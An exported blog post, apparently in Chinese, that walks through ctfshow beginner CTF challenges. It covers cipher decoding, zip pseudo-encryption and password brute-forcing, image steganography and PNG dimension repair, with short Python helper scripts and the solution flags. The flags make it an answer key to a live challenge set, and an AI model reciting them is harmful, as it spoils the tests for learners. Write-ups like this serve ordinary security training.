{"id":168,"date":"2022-06-01T22:16:24","date_gmt":"2022-06-01T14:16:24","guid":{"rendered":"http:\/\/162.14.82.114\/?p=168"},"modified":"2022-06-01T22:16:24","modified_gmt":"2022-06-01T14:16:24","slug":"%e3%80%90ctfshow%e3%80%91%e8%90%8c%e6%96%b0","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/168\/06\/01\/2022\/","title":{"rendered":"\u3010ctfshow\u3011\u840c\u65b0"},"content":{"rendered":"

\u840c\u65b0<\/h1>\n

\u840c\u65b0\u8ba4\u8bc1<\/h2>\n
\u63d0\u4ea4\u840c\u65b0\u7801\u5b8c\u6210\u840c\u65b0\u8ba4\u8bc1\uff0c\u4e00\u5927\u6ce2\u9690\u85cf\u9898\u76ee\u6b63\u5728\u8d76\u6765\u3002\n\u840c\u65b0\u7801\u9700\u5728\u7fa4\u5185\u53ec\u5524\uff08\u558a\u4e00\u4e0b\u5c31\u53ef\u4ee5\u4e86)<\/code><\/pre>\n
\u52a0\u4e2a\u7fa4\uff0c\u7136\u540e\u53d1\u4e00\u4e2a==\u840c\u65b0\u7801==\uff0c\u7136\u540e\u5c31\uff0c\u5c31\uff0c\u5c31\u79bb\u8c31<\/p>\n
\"image-20220417182426285\"<\/div><\/p>\n
\u4e0d\u614c\uff0c\u76f4\u63a5\u804a\u5929\u8bb0\u5f55\u91cc\u641c\u4e00\u4e0b\uff1a<\/p>\n
\"image-20220417182601639\"<\/div><\/p>\n
\u6ca1\u4e8b\uff0c\u5f97\u5230flag\uff1a==f426d289bde96c16e9f8e2a314ef88b1==<\/p>\n
\u840c\u65b0_\u5bc6\u78011<\/h2>\n
\u5bc6\u6587\uff1a\n53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D\n\u63d0\u4ea4\u683c\u5f0f\uff1aKEY{XXXXXXXXXXXXXX}\n\u5de5\u5177\u4e0b\u8f7d\uff1ahttps:\/\/www.lanzoui.com\/i9fn2aj<\/code><\/pre>\n
\u5148\u89c2\u5bdf\u5bc6\u6587\uff0c\u53d1\u73b0\u6700\u5927\u5b57\u7b26\u662fF\uff0c\u731c\u6d4b\u662f16\u8fdb\u5236\uff0c\u53e6\u4e00\u65b9\u9762\u8fd9\u4e2a\u9644\u4ef6\u4e5f\u7ed9\u51fa\u4e86\u90e8\u5206\u63d0\u793a\uff1a<\/p>\n
\"image-20220417183045913\"<\/div><\/p>\n
\u514816\u8fdb\u5236\u8f6c\u5316\u4e00\u4e0b\uff1a\u7f51\u5740<\/a><\/p>\n
\"image-20220417183242284\"<\/div><\/p>\n
\u8f6c\u5316\u540e\u9732\u51fa\u4e86\u6807\u5fd7\u6027\u7684=<\/code>\u53f7\uff0c\u76f4\u63a5base64\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\n
\"image-20220417183625740\"<\/div><\/p>\n
\u53d1\u73b0\u6709{}<\/code>\uff0c\u7136\u540e\u7ed3\u5408\u4e0a\u9762\u7684\u90a3\u4e2a\u6587\u4ef6\u77e5\u9053\u662f\u6805\u680f\u5bc6\u7801\uff0c\u6328\u4e2a\u8bd5\u504f\u79fb\u91cf\uff1a<\/p>\n
\"image-20220417183849984\"<\/div><\/p>\n
\u5f97\u5230flag\uff01<\/p>\n
\u840c\u65b0_\u5bc6\u78012<\/h2>\n
\u51fa\u9898\u4eba\u5df2\u7d2f\uff0c\u968f\u4fbf\u6572\u4e86\u51e0\u4e0b\u952e\u76d8\u3002\u3002\u3002 rdcvbg 2qase3 6tghu7\nflag\u683c\u5f0fKEY{XXXXXX}<\/code><\/pre>\n
\u8fd9\u4e2a\u9898\u76ee\u4e4b\u524d\u88ab\u5957\u8def\u8fc7\uff0c\u67e5\u770b\u4e0b\u952e\u76d8\u770b\u4e00\u4e0b\u90a3\u51e0\u4e2a\u952e\u4f4d\u7f6e\u5c31\u77e5\u9053\u4e86\u3002\u3002\u3002\u7a7a\u683c\u662f\u95f4\u9694\uff0c\u8fde\u7eed\u7684\u5b57\u7b26\u56f4\u4f4f\u4e86\u4e00\u4e2a\u5b57\u6bcd\uff0c\u5c06\u4e09\u4e2a\u5b57\u6bcd\u8fde\u63a5\u8d77\u6765\u5c31\u53ef\u4ee5\u4e86\u3002<\/p>\n
\u6ce8\u610f\u4e0a\u9762\u7ed9\u51fa\u4e86flag\u7684\u683c\u5f0f\uff1a==KEY{fwy}==<\/p>\n
\u840c\u65b0 \u5bc6\u78013<\/h2>\n
\u9898\u76ee\u540d\u79f0\uff1a\u6211\u60f3\u5403\u57f9\u6839 \u9898\u76ee\u63cf\u8ff0\uff1a -- --- .-. ... . ..--.- .. ... ..--.- -.-. --- --- .-.. ..--.- -... ..- - ..--.- -... .- -.-. --- -. ..--.- .. ... ..--.- -.-. --- --- .-.. . .-. ..--.- -- -- -.. -.. -- -.. -- -.. -- -- -- -.. -.. -.. \/-- -.. -- -.. -.. --\/ -- -- -- -- -- \/-- -.. -.. -- -.. -- \/-- -.. -.. -- \u683c\u5f0f\uff1aflag{***********}\n<!--\u89e3\u5bc6\u5de5\u5177\u4e0b\u8f7d \u94fe\u63a5\uff1ahttps:\/\/pan.baidu.com\/s\/10_35gRb3S6eGW-4MLyJRuA \u63d0\u53d6\u7801\uff1a1a3f--><\/code><\/pre>\n
\u8fd9\u4e2a\u9898\u4e0d\u770b\u63d0\u793a\u4e5f\u80fd\u731c\u5230\u4e0d\u662f\u6469\u65af\u5bc6\u7801\u5c31\u662f\u57f9\u6839\u5bc6\u7801\uff0c\u6469\u65af\u5bc6\u7801\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\n
\"image-20220417185057970\"<\/div><\/p>\n
\u4ece\u7ed3\u679c\u6765\u770b\u8fd9\u4e2a\u89e3\u5bc6\u662f\u5bf9\u7684\uff0c\u90a3\u4e48\u5c06\u4e0a\u9762\u5947\u602a\u7684\/<\/code>\u53bb\u6389\u518d\u66ff\u6362\u5b57\u7b26<\/p>\n
\"image-20220417185828771\"<\/div>
\n
\"image-20220417190039413\"<\/div><\/p>\n
\u57f9\u6839\u89e3\u5bc6\uff1a<\/p>\n
\"image-20220417190206188\"<\/div><\/p>\n
\u770b\u7ed3\u679c\u5c31\u611f\u89c9\u5f88\u9760\u8c31\uff0c\u6309\u7167\u683c\u5f0f\u63d0\u4ea4\uff0c\u7ed3\u679c\u9519\u8bef\uff0c\u8f6c\u6362\u4e00\u4e0b\uff0c\u5c06\u5b57\u7b26\u5927\u5199\u63d0\u4ea4\uff0c\u6b63\u786e==flag{GUOWANG}==<\/p>\n
\u840c\u65b0 \u9690\u51992<\/h2>\n
\u53ea\u7ed9\u4e86\u4e00\u4e2a\u6587\u4ef6\uff01<\/p>\n
\u4e0b\u8f7d\u6587\u4ef6\uff0c\u53d1\u73b0\u6709\u5bc6\u7801\uff0c\u76f4\u63a5\u4e22\u5230archpr<\/code>\u7206\u7834\u4e00\u4e0b\uff0c\u6ca1\u7206\u7834\u51fa\u6765\uff0c\u770b\u4e00\u4e0bhint\uff1a<\/p>\n
\"image-20220417191059079\"<\/div><\/p>\n
\u5148\u731c\u6d4b\u662f\u4f2a\u52a0\u5bc6<\/a>\uff0c\u5168\u5c40\u65b9\u5f0f\u4f4d\u6807\u8bb0\u7684\u56db\u4e2a\u6570\u5b57\u4e2d\u53ea\u6709\u7b2c\u4e8c\u4e2a\u6570\u5b57\u5bf9\u5176\u6709\u5f71\u54cd\uff0c\u5176\u5b83\u7684\u4e0d\u7ba1\u4e3a\u4f55\u503c\uff0c\u90fd\u4e0d\u5f71\u54cd\u5b83\u7684\u52a0\u5bc6\u5c5e\u6027\uff01 <\/p>\n
\"image-20220417192432279\"<\/div><\/p>\n
\n
\u7b2c\u4e8c\u4e2a\u6570\u5b57\u4e3a\u5947\u6570\u65f6 \u2013>\u52a0\u5bc6
\n\u7b2c\u4e8c\u4e2a\u6570\u5b57\u4e3a\u5076\u6570\u65f6 \u2013>\u672a\u52a0\u5bc6<\/p>\n<\/blockquote>\n
\u5c06\u4e0a\u97620108<\/code>\u6539\u62100008<\/code>\u5373\u53ef\u89e3\u538b\uff1a\u7136\u540e\u5c31\uff1a<\/p>\n
\"image-20220417194017729\"<\/div><\/p>\n
\u6211\u88c2\u5f00\uff0c\u679c\u65ad\u9009\u62e9\u7206\u7834\uff1a\uff08\u8fd9\u91cc\u6362\u4e86\u4e2a\u5de5\u5177\uff0c\u4e4b\u524d\u90a3\u4e2a\u5de5\u5177\u91cd\u65b0\u8bbe\u7f6e\u4e00\u4e0b\u4e5f\u662f\u53ef\u4ee5\u7684\uff09<\/p>\n
\"image-20220417194936214\"<\/div><\/p>\n
\u6253\u5f00\u538b\u7f29\u5305\u91cc\u7684\u6587\u672c\uff0c\u5f97\u5230flag==flag{brute_force}==<\/p>\n
\u840c\u65b0 \u9690\u51994<\/h2>\n
\u56fe\u7247\u8fd9\u4e48\u597d\u770b\uff0c\u4f46\u662f\u6ca1\u5565\u7528\u5466<\/code><\/pre>\n
\u6253\u5f00\u9644\u4ef6\u7684 doc\u6587\u4ef6\uff1a<\/p>\n
\"image-20220530165730371\"<\/div><\/p>\n
\u5e94\u8be5\u4e0d\u81f3\u4e8e\u5b58\u56fe\u7247\u7136\u540ezsteg\u3002\u3002\u3002\u3002\u770b\u770b\u6709\u6ca1\u6709\u9690\u85cf\u6587\u5b57\u7684\u9009\u9879\uff1a<\/p>\n
\"image-20220530165930492\"<\/div><\/p>\n
\u5f97\u5230flag\uff01\uff01\uff01<\/p>\n
\u840c\u65b0 \u5bc6\u7801#4<\/h2>\n
QW8obWdIWF5FKUFSQW5URihKXWZAJmx0OzYiLg==<\/code><\/pre>\n
\u7b2c\u4e00\u53cd\u5e94\u662f base64\uff1a<\/p>\n
\"image-20220530170334328\"<\/div><\/p>\n
\u5f97\u5230\uff1a<\/p>\n
Ao(mgHX^E)ARAnTF(J]f@<6".\n#<\u662f\u8f6c\u4e49\u7b26\u53f7\uff0c\u5e94\u8be5\u662f<,\u66ff\u6362\u5f97\u5230\n#Ao(mgHX^E)ARAnTF(J]f@<6".<\/code><\/pre>\n
\u6ca1\u529e\u6cd5\uff0c\u6c42\u52a9hint\u4e86\uff1a<\/p>\n
\u6bd4base64\u8fd8\u5927\u7684base\n\u63a8\u8350\u7f51\u7ad9 http:\/\/www.nicetool.net\/tag\/base\/\nPS:\u505a\u9898\u65f6\u5019\u53d1\u73b0\u73b0\u5728\u5df2\u7ecf\u53d8\u6210https:\/\/www.tooleyes.com\/\u4e86\uff01\uff01<\/code><\/pre>\n
\u6328\u4e2a\u8bd5\uff0c\u6216\u8005\u4f7f\u7528\u522b\u4eba\u5199\u597d\u7684\u5de5\u5177\uff1a<\/p>\n
#\u54b8\u6c34\u9c7c\u5e08\u5085\u5199\u7684base\u89e3\u5bc6\u811a\u672c\uff01\uff01\uff01\uff01\u8be6\u7ec6\u53ef\u4ee5\u770b\uff1ahttps:\/\/zhuanlan.zhihu.com\/p\/454458711\n#encoding=utf-8\nimport base36\nimport base58\nimport base62\nimport base64\nimport base91\nimport py3base92 #\u7531\u4e8epython3\u4e0d\u517c\u5bb9base92\uff0c\u6b64\u4e3agithub\u4e0a\u7684\u4e00\u4e2a\u9879\u76ee\nimport base128\n\n'''\ntxt=b"123456"\n\nb128 = base128.base128(chars = None, chunksize = 7)  \nbase128_encode=list(b128.encode(txt))\nbase128_decode=b''.join(b128.decode(base128_encode))\nprint(base128_decode)\n'''\n\ndef encode(txt):\n    print("[+]input is ", end="")\n    print(txt)\n\n    print("==============================================================================")\n    #base16\n    print("[\u6210\u529f]base16 encode: ", end="")\n    print(base64.b16encode(txt))\n\n    #base32\n    print("[\u6210\u529f]base32 encode: ", end="")\n    print(base64.b32encode(txt))\n\n    #base36\n    try:\n        base36_m_str = bytes.decode(txt)\n        base36_m_int = int(base36_m_str)\n\n        base36_cipher = base36.dumps(base36_m_int)\n        print("[\u6210\u529f]base36 encode: ", end="")\n        print(base36_cipher)\n    except Exception as e:\n        print("[\u5931\u8d25]base36 encode: ", end="")\n        print("base36\u52a0\u5bc6\u53ea\u652f\u6301\u6574\u6570\u6570\u5b57")\n\n    #base58\n    print("[\u6210\u529f]base58 encode: ", end="")\n    print(base58.b58encode(txt))\n\n    #base62\n    print("[\u6210\u529f]base62 encode: ", end="")\n    print(base62.encodebytes(txt))\n\n    #base64\n    print("[\u6210\u529f]base64 encode: ", end="")\n    print(base64.b64encode(txt))\n\n    #base85\n    print("[\u6210\u529f]base85 encode: ", end="")\n    print(base64.b85encode(txt))\n\n    #base91\n    print("[\u6210\u529f]base91 encode: ", end="")\n    print(base91.encode(txt))\n\n    #base92\n    print("[\u6210\u529f]base92 encode: ", end="")\n    print(py3base92.encode(txt))\n\n    #base128\n    # b128 = base128.base128(chars = None, chunksize = 7)\n    # print("[\u6210\u529f]base128 encode: ", end="")\n    # print(list(b128.encode(txt)))\n\ndef decode(txt):\n    print("[+]input is ", end="")\n    print(txt)\n    print("==============================================================================")\n\n    #base16\n    try:\n        base16_decode = base64.b16decode(txt)\n        print("[\u6210\u529f]base16 decode: ", end="")\n        print(base16_decode)\n        print()\n    except Exception as e:\n        print("[\u5931\u8d25]base16 decode: ", end="")\n        print(e)\n\n    #base32\n    try:\n        base32_decode = base64.b32decode(txt)\n        print("[\u6210\u529f]base32 decode: ", end="")\n        print(base32_decode)\n        print()\n    except Exception as e:\n        print("[\u5931\u8d25]base32 decode: ", end="")\n        print(e)\n\n    #base36\n    try:\n        base36_decode = base36.loads(txt)\n        print("[\u6210\u529f]base36 decode: ", end="")\n        print(base36_decode)\n        print()\n    except Exception as e:\n        print("[\u5931\u8d25]base36 decode: ", end="")\n        print(e)\n\n    #base58\n    try:\n        base58_decode = base58.b58decode(txt)\n        print("[\u6210\u529f]base58 decode: ", end="")\n        print(base58_decode)\n        print()\n    except Exception as e:\n        print("[\u5931\u8d25]base58 decode: ", end="")\n        print(e)\n\n    #base62\n    try:\n        base62_c_string = bytes.decode(txt)\n        base62_decode = base62.decodebytes(base62_c_string)\n        print("[\u6210\u529f]base62 decode: ", end="")\n        print(base62_decode)\n        print()\n    except Exception as e:\n        print("[\u5931\u8d25]base62 decode: ", end="")\n        print(e)\n\n    #base64\n    try:\n        base64_decode = base64.b64decode(txt)\n        print("[\u6210\u529f]base64 decode: ", end="")\n        print(base64_decode)\n        print()\n    except Exception as e:\n        print("[\u5931\u8d25]base64 decode: ", end="")\n        print(e)\n\n    #base85\n    try:\n        base85_decode = base64.a85decode(txt).decode()\n        print("[\u6210\u529f]base85 decode: ", end="")\n        print(base85_decode)\n        print()\n    except Exception as e:\n        print("[\u5931\u8d25]base85 decode: ", end="")\n        print(e)\n\n    #base91\n    try:\n        base91_decode = base91.decode(str(txt, encoding="utf-8")).decode()\n        print("[\u6210\u529f]base91 decode: ", end="")\n        print(base91_decode)\n        print()\n    except Exception as e:\n        print("[\u5931\u8d25]base91 decode: ", end="")\n        print(e)\n\n    #base92\n    try:\n        base92_decode = py3base92.decode(str(txt, encoding="utf-8"))\n        print("[\u6210\u529f]base92 decode: ", end="")\n        print(base92_decode)\n        print()\n    except Exception as e:\n        print("[-]base92 decode: ", end="")\n        print(e)\n\n    #base128\n    # try:\n    #     b128 = base128.base128(chars = None, chunksize = 7)\n    #     print(type(txt))\n    #     txt=list(bytes(txt))#byte\u8f6clist\n    #     print(type(txt))\n    #     base128_decode = b''.join(b128.decode(txt))\n    #     print("[\u6210\u529f]base128 decode: ", end="")\n    #     print(base128_decode)\n    #     print()\n    # except Exception as e:\n    #     print("[-]base128 decode: ", end="")\n    #     print(e)\nif __name__ == '__main__':\n    print("Welcome to base series encode and decode")\n    txt = input("Please input your string ::: ")\n\n    txt = str.encode(txt)\n    flag = input("Please input encode(1) or decode(\u56de\u8f66) ::: ")\n\n    if(flag == "1"):\n        encode(txt)\n    else:\n        decode(txt)<\/code><\/pre>\n
\u6700\u540e\u89e3\u5bc6\u5f97\u5230\uff1a<\/p>\n
\"image-20220530173926826\"<\/div><\/p>\n
\u840c\u65b0 \u9690\u51993<\/h2>\n
\"image-20220530213114037\"<\/div><\/p>\n
\u4eba\u5de6\u8fb9\u5c31\u662fflag\uff01\uff01\uff01\uff01<\/p>\n
\u6742\u98791<\/h2>\n
\u5c0f\u660e\u60f3\u7ed9\u5fc3\u7231\u7684\u59b9\u5b50\u8868\u767d\u5f88\u4e45\uff0c\u53ef\u662f\u4e0d\u77e5\u9053\u600e\u4e48\u5f00\u53e3\uff0c\u4f60\u80fd\u5e2e\u5e2e\u5c0f\u660e\u5417\uff1f\n\u5df2\u77e5 md5(\u8868\u767d\u7684\u8bdd+ctf)=ed400fbcff269bd9c65292a97488168a\n\u63d0\u4ea4flag{\u8868\u767d\u7684\u8bdd}<\/code><\/pre>\n
\u4f7f\u7528\u8fd9\u4e2a\u5b9d\u85cf\u7f51\u7ad9\uff1ahttps:\/\/www.somd5.com\/<\/a><\/p>\n
\"image-20220530214018831\"<\/div><\/p>\n
\u6545 flag\u4e3a\uff1a==flag{hello}==<\/p>\n
\u6742\u98792<\/h3>\n
\u5c0f\u660e\u7ec8\u4e8e\u627e\u5230\u4e86\u840c\u65b0\u7801\uff0c\u5f00\u59cb\u4e86\u81ea\u5df1\u7684CTF\u5192\u9669\u5f81\u7a0b<\/code><\/pre>\n
\u6253\u5f00\u538b\u7f29\u5305\uff0c\u53d1\u73b0\uff1a<\/p>\n
\"image-20220530214257325\"<\/div><\/p>\n
\u4e22\u5230winhex\u770b\u4e00\u4e0b\u6709\u6ca1\u6709\u9690\u85cf\u4fe1\u606f\uff1a<\/p>\n
\"image-20220530214349679\"<\/div><\/p>\n
\u5f97\u5230flag\uff1a==flag{ctfshow_im_coming}==<\/p>\n
\u840c\u65b0 \u6742\u98793<\/h2>\n
\u5927\u5bb6\u597d\u6211\u662f\u5c0f\u840c\u65b0\u7fbd\uff0c\u524d\u4e0d\u4e45\u6211\u7684\u4e00\u4e2a\u670b\u53cb\u7ed9\u6211\u4e86\u4e00\u5f20\u94f6\u884c\u5361\uff0c\u4ed6\u8bf4\u91cc\u9762\u6709\u4e00\u5927\u7b14\u94b1\uff0c\u4f46\u662f\u4ed6\u53ea\u544a\u8bc9\u6211\u4ed6\u7684\u751f\u65e5\u662f\u4e5d\u4e03\u5e74\u5341\u6708\u4e00\u65e5\uff0c\u4f60\u80fd\u5e2e\u6211\u731c\u731c\u4ed6\u7684\u94f6\u884c\u5361\u5bc6\u7801\u662f\u591a\u5c11\u5417\uff0c\u54e6\u5bf9\uff0c\u8fd9\u4e2a\u670b\u53cb\u6709\u4e2a\u5c0f\u540d\u53eb\u5c0f\u4e94\u3002\nflag\u683c\u5f0f\uff1aflag{\u94f6\u884c\u5361\u5bc6\u7801}<\/code><\/pre>\n
\u6211\u6ca1\u5565\u597d\u65b9\u6cd5\uff0c\u76f4\u63a5\u786c\u731c971001<\/code>\uff0c\u7ed3\u679c\u4e0d\u5bf9\uff0c\u731c\u6d4b\u5176\u4ed6\u7ec4\u5408\u4e5f\u4e0d\u5bf9\uff0c\u522b\u7684\u5e08\u5085\u5199\u7684\u662f\u56e0\u4e3a\u8c10\u97f3\u6897\uff0cxiaowu=15<\/code>\u5f97\u5230971015<\/code>\u3002\u3002\u3002\u3002<\/p>\n
\u6742\u98794<\/h2>\n
\u5c0f\u660e\u5fc3\u7231\u7684\u56fe\u7247\u5728\u538b\u7f29\u5305\u4e2d\uff0c\u53ef\u662f\u5c0f\u660e\u591c\u6df1\u4eba\u9759\u7684\u65f6\u5019\uff0c\u5b64\u6795\u96be\u7720\uff0c\u60f3\u6253\u5f00\u56fe\u7247\u6392\u9063\u5bc2\u5bde\uff0c\u53ef\u662f\u5fd8\u8bb0\u4e86\u5bc6\u7801\u4e86\uff0c\u5c0f\u7c73\u4f9d\u7a00\u8bb0\u5f979\u4f4d\u7684\u5bc6\u7801\u90fd\u662f\u6570\u5b57\uff0c\u524d3\u4f4d\u662f372\uff0c\u4f60\u80fd\u5e2e\u52a9\u5c0f\u660e\u5417\uff1f\nflag{372XXXXXX}<\/code><\/pre>\n
\u9644\u4ef6\u662f\u4e00\u4e2a\u6709\u5bc6\u7801\u7684zip\u6587\u4ef6\uff1a<\/p>\n
\"image-20220530220110288\"<\/div><\/p>\n
\u5f97\u5230\u5bc6\u7801\uff0c\u6253\u5f00\u83b7\u5f97flag\uff01flag{ctfshow_good}<\/del><\/p>\n
flag\u662f\u9898\u76ee\u7ed9\u7684\u90a3\u4e2a==flag{372609038}==<\/p>\n
\u6742\u98795<\/h2>\n
\u5c0f\u660e\u5982\u613f\u4ee5\u507f\u7684\u6253\u5f00\u4e86\u538b\u7f29\u5305\uff0c\u53ef\u662f\u773c\u524d\u7684\u6587\u5b57\u81ea\u5df1\u53ea\u80fd\u8ba4\u8bc6FBI\uff0c\u5176\u4ed6\u7684\u90fd\u4e0d\u8ba4\u8bc6\uff0c\u800c\u4e14\u5c4f\u5e55\u51fa\u73b0\u4e86\u4e00\u53e5\u8bdd\uff0c\u4f60\u80fd\u5e2e\u5c0f\u660e\u627e\u5230\u8fd9\u53e5\u8bdd\u7684\u610f\u601d\u5417\uff1f<\/code><\/pre>\n
\u6253\u5f00\u6587\u4ef6\uff1a<\/p>\n
\u5c0f\u660e\u5982\u613f\u4ee5\u507f\u7684\u6253\u5f00\u4e86\u538b\u7f29\u5305\uff0c\u53ef\u662f\u773c\u524d\u7684\u6587\u5b57\u81ea\u5df1\u53ea\u80fd\u8ba4\u8bc6FBI\uff0c\u5176\u4ed6\u7684\u90fd\u4e0d\u8ba4\u8bc6\uff0c\u800c\u4e14\u5c4f\u5e55\u51fa\u73b0\u4e86\u4e00\u53e5\u8bdd\uff0c\u4f60\u80fd\u5e2e\u5c0f\u660e\u627e\u5230\u8fd9\u53e5\u8bdd\u7684\u610f\u601d\u5417\uff1f\nFBI    No under 18\n\ni was always Fond of visiting new scenes, and observing strange characters and manners. even when a mere chiLd i began my travels, and made mAny tours of discovery into foreiGn {parts and unknown regions of my native City, to the frequent alarm of my parents, and The emolument of the town-crier. as i grew into boyhood, i extended the range oF my obServations. my holiday afternoons were spent in rambles about tHe surrounding cOuntry. i made myself familiar With all its places famous in history or fable. i kNew every spot where a murder or robbery had been committed, or a ghost seen. i visited the neighboring villages, and added greatly to my stock of knowledge,By noting their habits and customs, and conversing with their sages and great men.}<\/code><\/pre>\n
\u53ef\u4ee5\u770b\u5230\u6709\u4e00\u4e9b\u5927\u5199\u5b57\u6bcd\uff0c\u91c7\u96c6\u51fa\u6765\u5f97\u5230\uff1a\uff08\u4e0b\u9762\u662f i_kei \u5e08\u5085\u7684\u811a\u672c\uff0c\u5229\u7528\u6b63\u5219\u7b5b\u9009\uff09<\/p>\n
# i_kei\n# 2021\/1\/10 14:02\nimport re\nstring = 'i was always Fond of visiting new scenes, and observing strange characters and manners. even when a mere chiLd i began my travels, and made mAny tours of discovery into foreiGn {parts and unknown regions of my native City, to the frequent alarm of my parents, and The emolument of the town-crier. as i grew into boyhood, i extended the range oF my obServations. my holiday afternoons were spent in rambles about tHe surrounding cOuntry. i made myself familiar With all its places famous in history or fable. i kNew every spot where a murder or robbery had been committed, or a ghost seen. i visited the neighboring villages, and added greatly to my stock of knowledge,By noting their habits and customs, and conversing with their sages and great men.}'\n\nresult = ''.join(re.findall(r'[A-Z\\{\\}]',string))\nprint(result)<\/code><\/pre>\n
==FLAG{CTFSHOWNB}==<\/p>\n
\u6742\u98796<\/h2>\n
\u5c0f\u660e\u7684\u538b\u7f29\u5305\u53c8\u5fd8\u8bb0\u5bc6\u7801\u4e86\uff1f\u4ed6\u53bb\u7535\u8111\u7ef4\u4fee\u5e97\u53bb\u4fee\uff0c\u4eba\u5bb6\u6254\u51fa\u6765\u8bf4\u8fd9\u4e2a\u6839\u672c\u5c31\u6ca1\u6709\u5bc6\u7801\uff0c\u662f\u4e2a\u5047\u5bc6\u7801\u3002\u5c0f\u660e\u61f5\u4e86\uff0c\u660e\u660e\u6709\u5bc6\u7801\u7684\u554a\uff0c\u4f60\u80fd\u5e2e\u5e2e\u5c0f\u660e\u5417\uff1f<\/code><\/pre>\n
\u672c\u9898\u8003\u67e5\u4f2a\u52a0\u5bc6\uff0cwinhex\u6253\u5f00\u66f4\u6539\u4e00\u4e0b\u5c31\u53ef\u4ee5\u4e86\uff1a<\/p>\n
\"image-20220531124250380\"<\/div><\/p>\n
\u5f97\u5230flag\uff1a==flag{c_t_f_s_h_o_w}==<\/p>\n
\u6742\u98797<\/h2>\n
\u5c0f\u660e\u5c0f\u5fc3\u7ffc\u7ffc\u7684\u6253\u5f00\u538b\u7f29\u5305\uff0c\u7adf\u7136\u662f\u4e2a\u56fe\u7247\uff0c\u4ec0\u4e48\u9b3c\uff1f\n\u8981\u662f\u56fe\u7247\u80fd\u7ee7\u7eed\u5f80\u957f\u4e00\u70b9\u8be5\u591a\u597d\u554a\uff0c\u5c0f\u660e\u6697\u6697\u7684\u60f3\u3002\n\u4f60\u80fd\u5e2e\u5c0f\u660e\u5b8c\u6210\u8fd9\u4e2a\u6734\u7d20\u7684\u68a6\u60f3\u5417\uff1f<\/code><\/pre>\n
\u56fe\u7247\u5c31\u4e0d\u653e\u4e86\uff0c\u5c11\u513f\u4e0d\u5b9c\uff1a<\/p>\n
\"image-20220531125504233\"<\/div><\/p>\n
flag\uff1a==flag{beautiful}==<\/p>\n
\u8fd9\u91cc\u770b\u5230i_kei<\/a>\u5e08\u5085\u66f4\u539f\u7406\u6027\u7684\u89e3\u7b54\uff0c\u8be6\u60c5\u53ef\u4ee5\u53c2\u770bhttps:\/\/blog.csdn.net\/i_kei\/article\/details\/112412941#7_194<\/p>\n
\u5148\u7528 16 \u8fdb\u5236\u7f16\u8f91\u5668\u627e\u5230\u56fe\u7247\u7684src\uff0c\u7136\u540e\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n
\"img\"<\/div><\/p>\n
#i_kei\nimport struct\nimport binascii\nimport os\n\nm = open("flag.png","rb").read()\nk=0\nfor i in range(5000):\n    if k==1:\n        break\n    for j in range(5000):\n        c = m[12:16] + struct.pack('>i', i) + struct.pack('>i', j)+m[24:29]\n        crc = binascii.crc32(c) & 0xffffffff\n        if crc == 0x889C2F07:\n            k = 1\n            print(hex(i),hex(j))\n            break<\/code><\/pre>\n
\u7b97\u51fa\u6b63\u786e\u7684\u5bbd\u548c\u9ad8\uff1a<\/p>\n
\"image-20220531130734789\"<\/div><\/p>\n
\u4fee\u6539\u957f\u5ea6\u5373\u53ef\uff01<\/p>\n
\u6742\u98798<\/h2>\n
\u5c0f\u660e\u770b\u5b8c\u56fe\u7247\u8001\u8138\u4e00\u7ea2\uff0c\u5fc3\u60f3\uff0c\u6211\u5973\u670b\u53cb\u80fd\u6709\u8fd9\u4e48\u7626\u5c31\u597d\u4e86\u3002<\/code><\/pre>\n
\"image-20220531130907161\"<\/div><\/p>\n
\u8fd9\u80af\u5b9a\u662f\u5bbd\u5ea6\u592a\u5927\u4e86\uff0c\u6309\u7167\u4e0a\u9762\u7684\u518d\u6765\u4e00\u6b21\u5c31\u884c\u4e86\uff0c\u5f97\u5230flag\uff01<\/p>\n
\"image-20220531131138432\"<\/div><\/p>\n
\u6742\u987910<\/h2>\n
\u5c0f\u660e\u51b3\u5b9a\u4e0d\u770b\u5c0f\u59d0\u59d0\u4e86\uff0c\u6458\u6389800\u5ea6\u7684\u773c\u955c\uff0c\u671b\u5411\u8fd9\u4e2a\u56fe\u7247\u3002<\/code><\/pre>\n
\"image-20220531131305824\"<\/div><\/p>\n
\u4e00\u770b\u9898\u76ee\u5c31\u77e5\u9053\u4e0d\u662f\u90a3\u79cd\u6b63\u7ecf\u9898\u76ee\uff0c\u6211\u662f\u4e00\u8138\u61f5\u903c\u7684\uff0c\u6ca1\u6709\u8fd1\u89c6\uff0c\u9ebb\u4e86\uff0c\u772f\u7740\u773c\u775b\u770b\u597d\u50cf\u662f\u6211\u597d\u559c\u6b22\u4f60<\/code>\uff0c\u63d0\u4ea4\u6b63\u786e\u3002\u3002\u3002\uff08\u6ce8\u610f\u683c\u5f0f\uff09<\/p>\n
\u6742\u987911<\/h2>\n
\u5c0f\u660e\uff1a\u600e\u4e48\u53c8\u8bf4\u6211\uff1f\uff1f\uff1f<\/code><\/pre>\n
\u6253\u5f00\u7167\u7247\uff1a<\/p>\n
\"image-20220531132320832\"<\/div><\/p>\n
\u4f7f\u7528\u7ed9\u7684\u90a3\u4e2aJphswin<\/code>\u5de5\u5177\uff0c\u70b9\u51fbseek\uff0c\u9009\u4e00\u4e2a\u4fdd\u5b58\u8def\u5f84\u3002<\/p>\n
\"image-20220531203936652\"<\/div><\/p>\n
\u4fdd\u5b58\u4e3a a \uff0clinux\u4e0b\u770b\u4e00\u4e0b\u662f\u5565\u6587\u4ef6\uff1a<\/p>\n
\"image-20220531204252321\"<\/div><\/p>\n
ok\uff0c\u6362\u4e2a\u540e\u7f00\u540d\uff0c\u6253\u5f00\u53d1\u73b0\u662f\u4e00\u4e2a\u4e8c\u7ef4\u7801\uff1a<\/p>\n
\"image-20220531204336412\"<\/div><\/p>\n
CQresearch\u626b\u4e00\u4e0b\uff1a<\/p>\n
\"image-20220531204432556\"<\/div><\/p>\n
\u5bc6\u6587\u662f\u4e00\u6bb5base64<\/code>\u7684\uff0c\u89e3\u7801\u4e00\u4e0b\uff1a<\/p>\n
\"image-20220531204559162\"<\/div><\/p>\n
\u9690\u51991<\/h2>\n
\u5c0f\u660e\u51b3\u5b9a\u6d17\u5fc3\u9769\u9762\u5b66\u9690\u5199\u4e86<\/code><\/pre>\n
